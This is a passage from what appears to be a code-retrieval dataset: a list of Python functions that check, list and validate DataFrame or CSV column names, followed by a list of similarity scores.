validate_column_names(self, cols):\n self.stdout.write('Verifying CSV header')\n csv_cols = set(cols)\n if self.required_csv_columns <= csv_cols:\n return True\n else:\n missing_cols = set(self.required_csv_columns).difference(csv_cols)\n raise ValidationError(\n \"These columns '{0}' are required, but missing in the CSV \"\n \"file.\".format(\n ', '.join(missing_cols)\n )\n )", "def get_feature_columns(all_cols):\n return [col for col in all_cols if col not in get_non_feature_columns()]", "def _columns(cls, schema: dsl.Source.Schema) -> typing.Sequence[str]:\n return tuple(f.name for f in schema)", "def verify(self):\n for col in self.columns:\n if col not in self.table_obj.columns.keys():\n raise Exception('{} column not found in {}'.format(\n col, self.table_obj))", "def test_get_column_names(self):\n table = 'test_table_cols'\n columns = ['col1', 'col2', 'col3']\n\n with self.dbh.table_recreate(table, columns, 'integer'):\n try:\n res = self.dbh.get_column_names(table)\n except Exception:\n self.dbh.rollback()\n raise\n\n self.assertEqual(res, columns)", "def _cols_if_none(X, self_cols):\n return X.columns.tolist() if not self_cols else self_cols", "def remove_columns(lst):\n cols_rem = ['yearID','Team','lgID','Name','X','playerID','pops']\n\n for item in cols_rem:\n if item in lst:\n lst.remove(item)\n\n return(lst)", "def dropped_column_name_list(self):\n column_list = []\n new_tbl_columns = [col.name for col in self._new_table.column_list]\n for col in self._old_table.column_list:\n if col.name not in new_tbl_columns:\n column_list.append(col.name)\n return column_list", "def check_df_col(df, column, name=None):\n if column is not None:\n\n if type(column) != list:\n\n column = [column]\n\n for col in column:\n if name is None:\n error_message = f\"The value '{col}' is not present in any of the columns of your DataFrame.\"\n else:\n error_message = f\"Your {name} value '{col}' is not present in any of the columns of your DataFrame.\"\n error_message += \"\\nYou may be looking for:\\n \" + str(list(df.columns))\n\n assert col in df.columns, error_message", 
"def _check_required_columns(self, param_df, var_name='param_mean'):\n\n if param_df is None:\n return pd.DataFrame()\n\n try:\n if param_df.shape[0] == 0:\n return pd.DataFrame(columns=list(set(self.required_columns[var_name])|set(param_df.columns)))\n\n if self.required_columns[var_name] - set(param_df.columns) == set([]): # df has required cols.\n return param_df\n else:\n note = \"'{}' must be a pd.DataFrame with the following column names: \".format(var_name) + \\\n _list_the_errors(self.required_columns[var_name] - set(param_df.columns)) + \".\"\n raise ValueError(note)\n except KeyError:\n raise KeyError(\"'{}' is not supported\".format(var_name))", "def _check_features_df(df, features):\n # check columns\n if not set(features).issubset(df.columns):\n raise ValueError(\"The dataframe does not seem to have the right \"\n \"features. {0} instead of {1}\"\n .format(df.columns, features))\n\n return", "def validate(self):\n super().validate()\n frame = getattr(self, 'frame', None)\n if frame is None:\n raise ValueError('Missing columns %s since no frame' % ', '.join(\n self.required_cols))\n cols = set(list(self.frame))\n missing = sorted(self.required_cols - cols)\n if missing:\n raise ValueError('Missing columns: [%s]' % ', '.join(missing))", "def columns_names(self):\r\n return self._columns_names", "def _init_colnames(self):\n\n for name in (\"xaxes\", \"yaxes\", \"hist\", \"chist\"):\n val = getattr(self, name, None)\n if val is not None:\n if val:\n # Convert list of regular expressions into list of names.\n colnames = self._refres.find_colnames(getattr(self, name))\n else:\n colnames = []\n setattr(self, name, colnames)\n else:\n # Set the default values.\n colnames = iter(self._refdefs.info)\n col1 = next(colnames)\n col2 = next(colnames)\n\n if name != \"yaxes\":\n setattr(self, name, [col1])\n else:\n setattr(self, name, [col2])\n\n # At this point we've got the list of column names based on the first test result. 
But if\n # there are multiple test results, we should find the largest common subset, in case other\n # test results are missing some of the columns present in the first (reference) test result.\n for name in (\"xaxes\", \"yaxes\", \"hist\", \"chist\"):\n intersection = set(getattr(self, name))\n for res in self.rsts:\n intersection = intersection & res.colnames_set\n colnames = []\n for colname in getattr(self, name):\n if colname in intersection:\n colnames.append(colname)\n else:\n _LOG.warning(\"dropping column '%s' from '%s' because it is not present in one \"\n \"of the results\", colname, name)\n setattr(self, name, colnames)\n\n # Verify that we have at least one X-column and Y-column.\n if not self.xaxes or not self.yaxes:\n if not self.xaxes:\n name = \"X\"\n else:\n name = \"Y\"\n raise Error(f\"the {name} axis column list is empty\")", "def test_columns_set_to_all_columns_when_none(self):\n\n df = d.create_df_1()\n\n x = BaseTransformer(columns=None)\n\n x.columns_set_or_check(X=df)\n\n h.assert_equal_dispatch(\n expected=list(df.columns.values),\n actual=x.columns,\n msg=\"x.columns set when None\",\n )", "def base_columns(self):\r\n _base_columns = set(self.all_columns).intersection(set(self.reqd_columns))\r\n return list(_base_columns)", "def test_set_col_names(self):\n self.dboard.set_col_names([\"A\", \"B\"])\n self.assertTrue(hasattr(self.dboard, \"_col_names\"))\n self.assertEqual(2, len(self.dboard._col_names))", "def missing_columns(self):\r\n _missing_columns = set(self.reqd_columns).difference(set(self.all_columns))\r\n return list(_missing_columns)", "def columns(self):\n return self.__column_list", "def test_set_col_names_exception(self):\n with self.assertRaises(ValueError) as ctx:\n self.dboard.set_col_names([\"A\", \"B\", \"C\"])\n\n self.assertEqual(\"'names' list size does not match the number of columns allocated\", str(ctx.exception))", "def columns(self):\n return NotImplemented", "def test_new_columns(self):\n rename = '{}*'\n expected = (list(self.df.columns) +\n list(rename.format(f) for f in self.formants))\n actual = self.normalizer(rename=rename, **self.kwargs).normalize(\n self.df).columns\n\n expected = sorted(expected)\n actual = sorted(actual)\n self.assertListEqual(actual, expected)", "def parse_column_names(x_col_set, user_col_set):\n complete_cols = set()\n for col in user_col_set:\n complete_cols |= set([s for s in x_col_set if isinstance(col, str) and\n re.search(f'{col}(?=[+$^-])|{col}(?=__)|(?<=[+$^-]){col}', s)])\n return user_col_set | complete_cols", "def cols_in_df(df, partial_col_names, not_present=None):\n\n present = set([col for col in df.columns\n for part in partial_col_names\n if part in col])\n if not_present:\n to_exclude = set([col for col in present\n for part in not_present\n if part in col])\n result = list(present.difference(to_exclude))\n else:\n result = list(present)\n return result", "def list_data(self, as_strings=False):\n if self.df is None:\n return [] \n if as_strings:\n return [str(col) for col in self.df.columns]\n else:\n return list(self.df.columns.values)", "def _check_columns(cdm_column_names, csv_columns, result):\n columns_valid = True\n\n # if len(csv_columns) != len(cdm_column_names):\n\n # check all column headers in the file\n for col in csv_columns:\n if col not in cdm_column_names:\n e = dict(message=MSG_INCORRECT_HEADER, column_name=col, actual=col)\n result['errors'].append(e)\n columns_valid = False\n\n # check cdm table headers against headers in file\n for col in cdm_column_names:\n if col not 
in csv_columns:\n e = dict(message=MSG_MISSING_HEADER, column_name=col, expected=col)\n result['errors'].append(e)\n columns_valid = False\n\n # check order of cdm table headers against headers in file\n for idx, col in enumerate(cdm_column_names):\n if idx < len(csv_columns) and csv_columns[idx] != col:\n e = dict(message=MSG_INCORRECT_ORDER,\n column_name=csv_columns[idx],\n actual=csv_columns[idx],\n expected=col)\n result['errors'].append(e)\n columns_valid = False\n break\n\n return columns_valid", "def _column_exists(self, tbname, colname):\n self._check_file(tbname)\n tb = tbtool()\n tb.open(tbname)\n cols = tb.colnames()\n tb.close()\n return (colname in cols)", "def _validate_cols(cols):\n\n\tif cols is not None and len(cols) < 2:\n\t\traise ValueError('too few features')", "def getSupportedColumnList( platformTarget, target, unifiedBLT=False):\n if unifiedBLT:\n columnList = [[key, \"YES\"] for key in bltFieldsDict.keys()]\n else:\n columnIndex = getColumnIndex(platformTarget, target)\n \n columnList = []\n breakpoint()\n for key, val in bltFieldsDict.items():\n columnList.append([key, val[columnIndex]])\n\n return columnList", "def test_columns_str_to_list(self):\n\n x = BaseTransformer(columns=\"a\")\n\n expected_attributes = {\"columns\": [\"a\"]}\n\n h.test_object_attributes(\n obj=x,\n expected_attributes=expected_attributes,\n msg=\"String put in list for columns\",\n )", "def validate_match_columns(import_log, field_names, model_class, header_row):\n errors = []\n column_matches = import_log.import_setting.columnmatch_set.all()\n for field_name in field_names:\n field_object, model, direct, m2m = model_class._meta.get_field_by_name(field_name)\n if (direct and\n model and\n not field_object.blank):\n field_matches = column_matches.filter(field_name=field_name)\n if field_matches:\n if field_matches[0].column_name not in header_row:\n errors += [\"{0} is required but is not in your spreadsheet. 
\".format(field_object.verbose_name)]\n else:\n errors += [\"{0} is required but has no match.\".format(field_object.verbose_name)]\n \n return errors", "def valid_col_tester(self, state):\n vert_state = self.cols(state)\n for line in vert_state:\n line_index = vert_state.index(line)\n vert_word = self.check_word(vert_state[line_index])\n if not(vert_word):\n return False\n return True", "def list_all_columns(data):\n\n # Print columns to user.\n print(\"\\nFeatures in our original dataset include (one at a time, please!):\")\n print(\"-\" * 30)\n print(\"\")\n\n # Print each column in our DataFrame.\n for index, column in enumerate(data.columns.values):\n print(\"[{}] {}\".format(index, column))\n time.sleep(0.20)", "def get_returns_columns(df: pd.DataFrame) -> list:\n return [col for col in df.columns if '_period_return' in col]", "def test_field_names(self):\n\n for mb_model in self.mb_model_list:\n mb_fields = mb_model._meta.fields\n db_cols = connection.introspection.get_table_description(\n self.cursor, mb_model._meta.db_table)\n\n for i in range(0, len(mb_model._meta.fields)):\n self.assertEqual(\n mb_fields[i].column,\n db_cols[i].name\n )", "def test_columns_empty_list_error(self):\n\n with pytest.raises(ValueError):\n\n BaseTransformer(columns=[])", "def get_cols(df):\n meta = get_metafeatures(df)\n categorical_columns = meta.loc[meta['type'] == 'object', 'column'].tolist()\n cols_to_drop = meta.loc[meta['missing'] > 0.5, 'column'].tolist()\n logging.debug('%s categorical columns found', len(categorical_columns))\n logging.debug('%s columns will be dropped', len(cols_to_drop))\n return categorical_columns, cols_to_drop", "def identify_columns(structure: dict):\n\tknown_columns = list()\n\n\t# collect columns\n\tfor day in structure['data']:\n\t\tfor key in day.keys():\n\t\t\tif key not in known_columns:\n\t\t\t\tknown_columns.append(key)\n\n\treturn known_columns", "def check_column_names(expected_headings, found_headings):\n column_missing = False\n column_additional = False\n\n # Check if column headings exist\n logging.info(\"Checking column headers are correct.\")\n diff_columns = set(expected_headings) - set(found_headings)\n if len(diff_columns) > 0:\n column_missing = True\n\n # Check whether there are any additional columns (could need renaming)\n extra_columns = set(found_headings) - set(expected_headings)\n if len(extra_columns) > 0:\n column_additional = True\n\n # Check for duplicate headings\n # NOTE: As mangle_dupe_cols=True, any duplicate columns will be stored in the form column.1.... column.N\n # We use this to avoid overwriting data. 
However, to identify duplicate original columns, we need to remove\n # these prior to checking for dups\n main_column_names = [i.split(\".\")[0] for i in found_headings]\n duplicate_headings = len(main_column_names) > len(set(main_column_names))\n if duplicate_headings:\n logging.error(\"Duplicate headings identified.\")\n if column_missing:\n logging.error(\"Missing headers identified:\")\n print(diff_columns)\n if column_additional:\n logging.error(\"Additional headers identified:\")\n print(extra_columns)\n if column_missing or column_additional or duplicate_headings:\n logging.info(\n \"File will not pass checks as I am unable to tell \"\n \"what to do with the columns on my own.\"\n )\n return False\n return True", "def get_column_names(self, table):\n try:\n logging.info(f'Getting column names of table `{table}`')\n return list(self.execute(f'SELECT * FROM `{table}`'))\n except:\n logging.exception('Something went wrong getting column names. Check trace.')\n return", "def _is_all_int(df_list: List[Union[dd.DataFrame, pd.DataFrame]], col: str) -> bool:\n for df in df_list:\n if col in df.columns:\n srs = df[col]\n if isinstance(srs, (dd.DataFrame, pd.DataFrame)):\n for dtype in srs.dtypes:\n if not is_integer_dtype(dtype):\n return False\n elif isinstance(srs, (dd.Series, pd.Series)):\n if not is_integer_dtype(srs.dtype):\n return False\n else:\n raise ValueError(f\"unprocessed type of data:{type(srs)}\")\n return True", "def old_column_list(self):\n return [\n col.name\n for col in self._old_table.column_list\n if col.name not in self.dropped_column_name_list\n ]", "def test_clean_columns():\n assert clean_columns('Id, AdCampaignId, CampaignId') == ['id', 'adCampaignId', 'campaignId']", "def _manage_cols(df, drop_list=[], name_dict={}):\n\n for colname in drop_list:\n if colname not in df:\n raise ValueError(f\"Can't drop column '{colname}' - '{colname}' does not exist in dataframe\")\n for colname in list(name_dict.keys()):\n if colname not in df:\n raise ValueError(f\"Can't rename '{colname}' to '{name_dict[colname]}' - '{colname}' does not exist in dataframe\")\n if colname in drop_list:\n raise ValueError(f\"Can't rename '{colname}' to '{name_dict[colname]}' - '{colname}' in drop_list\")\n\n column_names = np.setdiff1d(list(df.columns), list(name_dict.keys()))\n lower_columns = [name.lower().replace(' ','').replace('_','') for name in column_names]\n for i in range(len(column_names)):\n name_dict[column_names[i]] = lower_columns[i]\n \n df = df.drop(drop_list, axis=1)\n df = df.rename(columns=name_dict)\n \n return df", "def check_column_values(self, values):\n none_keys = sorted(list(self._necessary_input_columns.intersection(set([elem for elem in self._columns if values[self.column_id[elem]] in [None, 'None']]))))\n if len(none_keys) > 0:\n raise Exception('missing_keys in ForcingOnMesh_DBManager add function parameter file_info:\\n%s\\n'%('\\n'.join([' - %s'%elem for elem in none_keys])))", "def get_sample_colnames(ms_df: DF) -> List[str]:\n\n sample_numbers = get_sample_numbers(ms_df)\n\n target_sample_cols = list()\n for sample in sample_numbers:\n for col in SAMPLE_COLS:\n target_sample_cols.append('{attr}_{sample}'.format(attr=col, sample=sample))\n return target_sample_cols", "def _test_df_headers(self, df):\n assert list(df.columns.values) == [\n 'Appliances', 'BathroomsFull', 'BathroomsHalf', 'Bedrooms',\n 'DateListed', 'Description', 'MlsId', 'MlsName', 'Price',\n 'Rooms', 'StreetAddress'\n ]", "def _validate_columns(data, ip_column, lat_column, long_column, 
other_columns):\n if not ip_column and not (lat_column and long_column):\n raise ValueError(\n \"Data must have either an IpAddress ('ip_column')\",\n \"or latitude ('lat_column') and longitude ('long_column')\",\n )\n param_cols: List[str] = []\n for param in other_columns:\n if not param:\n continue\n if isinstance(param, list):\n param_cols.extend(param)\n else:\n param_cols.append(param)\n missing_columns = {col for col in param_cols if col not in data.columns}\n if missing_columns:\n raise LookupError(\n \"The following columns are not in the supplied DataFrame\",\n \",\".join(f\"'{col}'\" for col in missing_columns),\n )", "def test_columns_not_in_X_error(self):\n\n df = d.create_df_1()\n\n x = BaseTransformer(columns=[\"a\", \"z\"])\n\n with pytest.raises(ValueError):\n\n x.columns_check(X=df)", "def setRequiredColumns(self, colnames):\n # Make sure all column names are lower case so comparisons in _TableRow\n # are not case sensitive. From a modularity standpoint, this should be\n # done in _TableRow, but it is more efficient to do it here, since the\n # conversion need be done only once.\n self.required_cols = [colname.lower() for colname in colnames]", "def test_defined_table_columns(model):\n inst = inspect(model)\n columns_from_model = [c_attr.key for c_attr in inst.mapper.column_attrs]\n _, columns = run_mysql(f\"SELECT * FROM {model.__tablename__} LIMIT 1;\")\n\n assert len(columns) == len(columns_from_model)\n assert set(columns) == set(columns_from_model)", "def _these_columns_cannot_annotate_exp_cons(self):\n _cols = set([]) #\n for param_name, req_cols in self.required_columns.items():\n _cols |= req_cols\n\n return _cols | self.other_useful_columns", "def _listed_ea_column_check():\n for ea_row in unused_list:\n ddi_index = views_index[ea_row[15]]\n # This check is performed in\n # _ea_in_disposition_col0_and_empty_ipr_d_col\n if ea_row[0] in ea_ipr_d_values and \\\n 'IPR Designation' not in \\\n ddi_data[ddi_index][ea_row[1]]['extattrs']:\n continue\n # Update IPR D src column with ea_row[0] for processing.\n # WORK IN PROGRESS\n elif ea_row[0] in ea_ipr_d_values and 'IPR Designation' \\\n in ddi_data[ddi_index][ea_row[1]]['extattrs']:\n pass\n # Processing listable columns.\n for key, value in ea_index.items():\n # Skip's unused keys.\n if key not in ['Datacenter', 'IPR Designation']:\n continue\n # Check for blank column and blank source column.\n if key not in ddi_data[ddi_index][ea_row[1]]['extattrs'] and \\\n ea_row[value] in ['', 'DDI']:\n continue\n # Check for Disposition col, check for comma not in IPR D col\n # value, check value in IPR D col to ea ipr d attribute list,\n # check IPR D col value eq ddi value.\n # On not listed IPR D values.\n if key == 'IPR Designation':\n if ea_row[0] in ea_ipr_d_values \\\n and ',' not in ea_row[16] \\\n and ea_row[16] in ea_ipr_d_values:\n ea_row[16] = ea_row[16] + ',' + ea_row[0]\n import_override.append([ea_row[15].strip(),\n ea_row[1].strip(),\n ea_row[14].strip(),\n {key: ea_row[16]}])\n continue\n # Check for Disposition col, check for comma not in IPR D col\n # value, check value in IPR D col to ea ipr d attribute list,\n # check IPR D col value eq ddi value.\n # On not listed IPR D values.\n elif ea_row[0] in ea_ipr_d_values \\\n and ',' not in ea_row[16] \\\n and ea_row[16] not in ea_ipr_d_values:\n import_override.append([ea_row[15].strip(),\n ea_row[1].strip(),\n ea_row[14].strip(),\n {key: ea_row[0]}])\n continue\n# # Check Disposition col. and if IPR D listed value needs\n# # updating. 
On listed IPR D values.\n# if ea_row[0].lower().strip() in ea_ipr_d_values \\\n# and ',' in ea_row[16]:\n# temp_list = ea_row[16].split(',')\n# temp_list = [x.strip() for x in temp_list]\n# if ea_row[0].lower().strip() in temp_list:\n# continue\n# else:\n# temp_list.append(ea_row[0].lower().strip())\n# temp_dict_override.update({key: temp_list})\n# import_override.append([ea_row[15].strip(),\n# ea_row[1].strip(),\n# ea_row[14].strip(),\n# temp_dict_override])\n# continue\n\n # Builds dataset for non-listed values. Final Step.\n # If key not in ddi data and src value is not none.\n # Assign to merge.\n if key not in ddi_data[ddi_index][ea_row[1]]['extattrs'] \\\n and ea_row[value] not in ['', 'DDI']:\n import_merge.append([ea_row[15].strip(),\n ea_row[1].strip(),\n ea_row[14].strip(),\n {key: ea_row[value]}])\n continue\n # Checks diff against src value and a populated value in the\n # ddi data and replaces with src value.\n if ea_row[value] != \\\n ddi_data[ddi_index][\n ea_row[1]]['extattrs'][key]['value']:\n import_override.append([ea_row[15],\n ea_row[1],\n ea_row[14],\n {key: ea_row[value]}])\n continue", "def columns_to_fix(df):\n return [col for col in df.columns.values if any([k in col and v in col for k, v in symmetric_dihedrals.items()])]", "def getColumnsNames(self):\r\n ColsName = []\r\n for i in range(len(self.columns)):\r\n ColsName.append(self.columns[i].getColName())\r\n return ColsName", "def test_analyze_columns(self):\n\t\t\n\n\t\tdetails = self.watcher.analyze()\n\t\tself.assertEqual(isinstance(details, pd.DataFrame), True, \"details is a pandas DataFrame\")\n\n\t\tcolumns = \"layer_id,name,D,M,N,alpha,alpha_weighted,has_esd,lambda_max,layer_type,log_alpha_norm,log_norm,log_spectral_norm,norm,num_evals,rank_loss,rf,sigma,spectral_norm,stable_rank,sv_max,sv_min,xmax,xmin,num_pl_spikes,weak_rank_loss\".split(',')\n\t\tprint(details.columns)\n\t\tfor key in columns:\n\t\t\tself.assertTrue(key in details.columns, \"{} in details. Columns are {}\".format(key, details.columns))", "def old_non_pk_column_list(self):\n return [\n col.name\n for col in self._old_table.column_list\n if col.name not in self._pk_for_filter\n and col.name not in self.dropped_column_name_list\n ]", "def can_convert_to_column(obj):\n return is_column_like(obj) or cudf.api.types.is_list_like(obj)", "def has_headers(self):\n for column in self.columns:\n if column.header:\n return True\n return False", "def get_column_names(self):\n # here, creating combined column/volue column names for uniqueness\n colname_temp = list()\n for column in self.col_value:\n colname_temp.append(self.question_column + \"-\" + str(column))\n return colname_temp", "def _check_k_columns(self, k_columns):\n for k in k_columns:\n if k not in self.twiss_df:\n LOG.debug(\"Added {:s} with all zero to data-frame.\".format(k))\n self.twiss_df[k] = 0." ]
[ "0.7229939", "0.69595104", "0.6792466", "0.6648041", "0.66035503", "0.65919405", "0.65672946", "0.6438893", "0.64331186", "0.6377156", "0.6362247", "0.63079476", "0.62102634", "0.61988276", "0.6196506", "0.61454993", "0.61221856", "0.61137414", "0.61022323", "0.6095521", "0.6069956", "0.6036684", "0.6021152", "0.5997814", "0.5990277", "0.5921229", "0.5898715", "0.589218", "0.5876364", "0.58750707", "0.5874513", "0.58173513", "0.5806046", "0.57765913", "0.57737464", "0.57680345", "0.57489556", "0.5734497", "0.5724966", "0.56925505", "0.56912625", "0.5675511", "0.56651795", "0.56633675", "0.5660129", "0.56576043", "0.565638", "0.5648455", "0.5645078", "0.5639649", "0.5631919", "0.56221026", "0.56172425", "0.5607265", "0.5593567", "0.5591346", "0.5587462", "0.558097", "0.55793184", "0.5578368", "0.5574349", "0.5568527", "0.5568103", "0.55662787", "0.55595297", "0.5558219", "0.55567265", "0.5554074", "0.5551062", "0.5545752", "0.55278325", "0.5523803", "0.5523007", "0.5522622", "0.5521311", "0.55142576", "0.551021", "0.55083287", "0.55077827", "0.5507471", "0.5505484", "0.54972214", "0.54971844", "0.54883754", "0.5486603", "0.5480362", "0.5477621", "0.5477535", "0.5469004", "0.5463214", "0.54555124", "0.54520977", "0.54514027", "0.5449112", "0.5441633", "0.5440788", "0.54322976", "0.5431746", "0.5431378", "0.54293764" ]
0.83148104
0
Function for parsing the recipient folder for FACS data files.
def parse_facs_files():\n    #Load parser settings\n    parser_settings = getattr(settings,'FACS_PARSER_SETTINGS')\n    files_to_parse = [parser_settings['facs_source_directory']+f for f in os.listdir(parser_settings['facs_source_directory']) if '.exp' in f]\n    for filename in files_to_parse:\n        #Compute MD5 hash\n        facs_file = file(filename,'rbU')\n        md5hash = hashlib.md5(facs_file.read()).hexdigest()\n        facs_file.close()\n        #Skip file if previously parsed.\n        if FacsFile.objects.filter(original_filename=filename,md5hash=md5hash):\n            print 'Skipping ', filename\n            continue\n        #Open file, remove null bytes and prepare csv reader\n        facs_file = file(filename, 'rU')\n        csv_reader = csv.reader((x.replace('\0', '') for x in facs_file),dialect=csv.excel_tab)\n        #Reader header\n        csv_header = csv_reader.next()\n        facs_file_results = []\n        #Parse the file\n        for csv_row in csv_reader:\n            if csv_row[0]:\n                facs_file_results.append(dict(zip(csv_header,csv_row)))\n        #Close the file\n        facs_file.close()\n        #Save the information to database and archive file\n        random_ints = ''.join([str(random.randint(0,9)) for n in range(10)])\n        archive_filename = parser_settings['facs_archive_directory'] + filename.split('/')[-1][:-4].split('_')[0] + '_' + random_ints + '.exp'\n        shutil.move(filename, archive_filename)\n        facs_file = FacsFile(\n            original_filename = filename,\n            md5hash = md5hash,\n            archive_filename = archive_filename,\n        )\n        facs_file.save()\n        #Remove empty elements\n        for result in facs_file_results:\n            for key, data in result.items():\n                if data == '.' or not(data):\n                    del result[key]\n        #Cache test code and interface mappings\n        test_codes = []\n        for testcode_mapping in TestCodeMapping.objects.filter(interface_name=parser_settings['testcode_interface_name']):\n            test_code = testcode_mapping.code\n            code = test_code.code\n            code_mapping = testcode_mapping.code_mapping\n            test_codes.append((code, code_mapping, test_code))\n        #Add results to database\n        for result in facs_file_results:\n            #Parse result date\n            result_date = dateutil.parser.parse(result[parser_settings['result_datetime']])\n            result_error_code = getattr(result, parser_settings['error_codes'], '')\n            result_identifier = result[parser_settings['sample_identifier']]\n            result_cytometer = result[parser_settings['cytometer_serial']]\n            #Create the dictionnary of result items.\n            new_result_item_dict = {}\n            for test_code, facs_file_column, test_code_object in test_codes:\n                new_result_item_dict[test_code] = ResultItem(\n                    test_code = test_code_object,\n                    result_item_value = result[facs_file_column],\n                    error_code = result_error_code,\n                    result_item_datetime = result_date,\n                )\n            #Search for possible duplicate result\n            is_duplicate = False\n            for possible_duplicate in FacsResult.objects.filter(result_identifier=result_identifier):\n                if possible_duplicate.get_resultitem_dict() == new_result_item_dict:\n                    is_duplicate = True\n                    break\n            #Save result and result item to data if it is not a duplicate\n            if not is_duplicate:\n                new_result = FacsResult(\n                    result_identifier=result_identifier,\n                    result_datetime=result_date,\n                    origin_facs_file=facs_file,\n                    cytometer_serial_number=result_cytometer,\n                )\n                new_result.save()\n                #Add the reference to the result for each item and save it to database.\n                for item in new_result_item_dict.values():\n                    item.result = new_result\n                    item.save()\n                new_result.link_to_requisition()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main(pst_file):\n opst = pypff.open(pst_file)\n root = opst.get_root_folder()\n\n message_data = folder_traverse(root, [], **{'pst_name': pst_file, 'folder_name': 'root'})\n\n header = ['pst_name', 'folder_name', 'creation_time', 'submit_time', 'delivery_time',\n 'sender', 'subject', 'attachment_count']\n\n return message_data, header", "def check_for_messages(folder, message_data, pst_name, folder_name):\n for message in folder.sub_messages:\n message_dict = process_message(message)\n message_dict['pst_name'] = pst_name\n message_dict['folder_name'] = folder_name\n message_data.append(message_dict)\n return message_data", "def parseMboxFolder(folder):\n\n longform = re.compile(\"(^.*)(<)(.*)(>$)\")\n quoted = re.compile('\".*\"')\n\n formail_cmd = \"formail -s formail -c -z -x'To:' -x'CC:' -x'BCC' < %s\" % folder\n results = os.popen(formail_cmd, \"r\").readlines()\n\n addresses = set()\n for line in results:\n line = quoted.sub(\"\", line)\n for entry in line.split(\",\"):\n entry = entry.strip()\n match = longform.match(entry)\n if match is None:\n address = entry\n addresses.add(address)\n else:\n address = match.group(3)\n addresses.add(address)\n\n return addresses", "def build_dataset(data_set, home_dir, dir, unique_spam, spam_top_50):\n \n file_list = os.listdir(home_dir + dir)\n count = len(file_list)\n for file_name in file_list:\n data_set[file_name] = DataMember()\n #Ignore files that start with .\n if file_name[0] == '.' or os.path.isdir(home_dir + dir + '/' + file_name) or \\\n os.path.islink(home_dir + dir + '/' + file_name):\n continue \n #print file_name \n file = open(home_dir + dir + '/' + file_name)\n mail = email.message_from_file(file)\n file.close()\n \n #Extract information from header\n for key in mail.keys():\n #1.) IP Address from the received field in the header (Easy just read it)\n #Get the IP address of the last Received from field unless its 127.0.0.1\n if key == 'Received':\n address = re.search('(\\d{1,3}\\.){3}\\d{1,3}',mail[key]).group()\n if address != '127.0.0.1':\n data_set[file_name].ip_address_str += address + ' '\n \n #3.) Subject (Easy just read it) \n if key == 'Subject':\n data_set[file_name].subject_str = repr(mail[key])[1:-1]\n \n #4.) Name from the From field (Easy just read it)\n if key == 'From':\n data_set[file_name].from_name_str = repr(mail[key])[1:-1]\n \n #2.) Matching degree of domain names between Message-Id and (Received/From ??) 
field (Easy just read and compare)\n if mail['From'] != None:\n from_domain = re.search('@[\\[\\]\\w+\\.]+', mail['From'])\n else:\n from_domain = None;\n if str(from_domain) != 'None':\n from_domain = from_domain.group()[1:]\n else:\n #Non-ascii domain name, pull out the hex encoding\n from_domain = repr(mail['From']).replace('\\\\x','')\n if from_domain.find('@') == -1:\n from_domain = ' '\n else:\n from_domain = re.search('@[\\[\\]\\w+\\.]+', from_domain).group()[1:]\n message_domain = re.search('@[\\[\\]\\w+\\.]+',mail['Message-ID'])\n if str(message_domain) != 'None':\n message_domain = message_domain.group()[1:]\n else:\n #Non-ascii domain name, pull out the hex encoding\n message_domain = repr(mail['Message-ID']).replace('\\\\x','')\n message_domain = repr(mail['Message-ID']).replace('%','')\n if message_domain.find('@') == -1:\n message_domain = ' '\n else:\n message_domain = re.search('@[\\[\\]\\w+\\.]+', message_domain).group()[1:]\n \n distance = nltk.edit_distance(from_domain, message_domain)\n domain_len = max(len(from_domain), len(message_domain), 1) * 1.0\n \n data_set[file_name].degree_domains_match = 1.0 - distance / domain_len\n \n #Get the length of the message and the text\n length = (get_message_len(mail) * 1.0)\n body = get_message_body(mail)\n\n #5.) Content type (Easy just read it)\n data_set[file_name].type_HTML = get_type_content(mail)\n #6.) Attachments: none, text, or non-text \n data_set[file_name].attachments = get_type_attachments(mail)\n #7.) Number of URLs present \n urls = re.findall( \\\n 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', \\\n body)\n data_set[file_name].num_urls = len(urls)\n \n #8.) URL ratio (% of message body that is URLs)\n data_set[file_name].percent_urls = len(''.join(urls)) / length\n \n #9.) SPAM word ratio \n #10.) SPAM degree as by equation in paper \n spam_count = 0\n w1 = 50 / 51.0\n w2 = 1 / 51.0\n freq_spam = 0.0\n s1 = 0.0\n s2 = 0\n \n body = nltk.clean_html(body)\n words = nltk.word_tokenize(body)\n word_count = max(1, len(words)) #Don't allow divide by zero\n for word in nltk.word_tokenize(body):\n if word in unique_spam:\n #Must be SPAM\n s2 = 1\n spam_count += 1\n elif word in spam_top_50:\n freq_spam += 1.0\n spam_count += 1\n \n s1 = freq_spam / word_count\n \n data_set[file_name].percent_spam = spam_count / length\n data_set[file_name].degree_spam = w1 * s1 + w2 * s2\n \n #11.) 
Classification label: Spam or Ham\n if file_name.startswith('ham'):\n data_set[file_name].spam = 1\n else:\n data_set[file_name].spam = 2\n #Fields that need to be md5 encoded are: IP address, Subject, and from \n ip_address_md5 = hashlib.md5()\n ip_address_md5.update(data_set[file_name].ip_address_str)\n data_set[file_name].ip_address = int(ip_address_md5.hexdigest(),16)\n \n subject_md5 = hashlib.md5()\n subject_md5.update(data_set[file_name].subject_str)\n data_set[file_name].subject = int(subject_md5.hexdigest(),16) \n \n from_name_md5 = hashlib.md5()\n from_name_md5.update(data_set[file_name].from_name_str)\n data_set[file_name].from_name = int(from_name_md5.hexdigest(),16) \n\n #for key in data_set.keys():\n # print data_set[key]\n return data_set\n #Repeat for ham files", "def fileExtract(tcp, friends, chats, posts):\n\n # if friends file exists open file and add friends user ids to friends dict\n if os.path.isfile('data/friends'):\n with open('data/friends') as f:\n for userid in f:\n friends[userid] = ('',0)\n\n # form server, get updated addresses for each friend\n for key in friends:\n tcp.sendMessage('SEARCH ' + key)\n address = tcp.receiveMessage().split()[-2:]\n address = (address[0], int(address[1]))\n friends[key] = (address)\n\n # if chats file exists open the file and add the data to chats dict\n if os.path.isfile('data/chats'):\n with open('data/chats') as f:\n for line in f:\n key, val = line.split()\n chats[key] = val\n\n # if posts file exists open the file and add the data to posts dict\n if os.path.isfile('data/posts'):\n with open('data/posts') as f:\n for line in f:\n templist = line.split()\n posts[templist[0]] = (templist[1], ' '.join(templist[2:]))", "def parse(self):\n\t\tfor part in self.mail.walk():\n\t\t\tself.process_part(part)", "def process(cfg):\n\n for section in cfg.sections():\n l = section.split(None, 1)\n if l[0] != 'depot':\n continue\n depot = l[1]\n depot = os.path.expanduser(depot)\n log.info('Depot %s', depot)\n\n def g():\n found = False\n for var, rules_name in 